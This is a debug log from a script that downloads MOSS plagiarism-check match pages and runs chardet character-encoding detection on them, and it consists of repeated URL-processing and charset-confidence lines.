http://moss.stanford.edu/results/374137986/match138-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match143-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36857\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31647\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36844\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31634\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36857\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31647\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36844\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31634\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36844\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31634\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31635\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36845\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31634\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36844\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.55965291689788\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5270038856948484\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5615367192125116\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match143-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match143-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match145-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match145-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match145-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match140-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match140-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match140-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5328896898249345\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match139-top.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19426\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32296\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19413\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19426\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32283\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19413\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.546674630352836\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32296\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19413\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19414\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32283\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19413\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32283\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32284\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32283\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5312540524801844\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5315341225731435\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match139-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match139-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match144-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match144-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match144-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match146-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match146-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match146-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19103\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19090\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19103\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19090\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19090\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19091\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19090\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544952431142531\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.545076723065711\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match142-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match142-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match142-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match141-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match141-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match141-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40957\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40944\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40957\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40944\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40944\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40945\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40944\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5580147851981956\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match147-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match147-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match147-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match148-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match152-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match148-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match152-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match148-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match152-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19763\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19750\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25590\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19763\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19750\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25577\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19750\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25590\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25577\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19751\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25577\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19750\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25578\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25577\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5280973138154603\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not 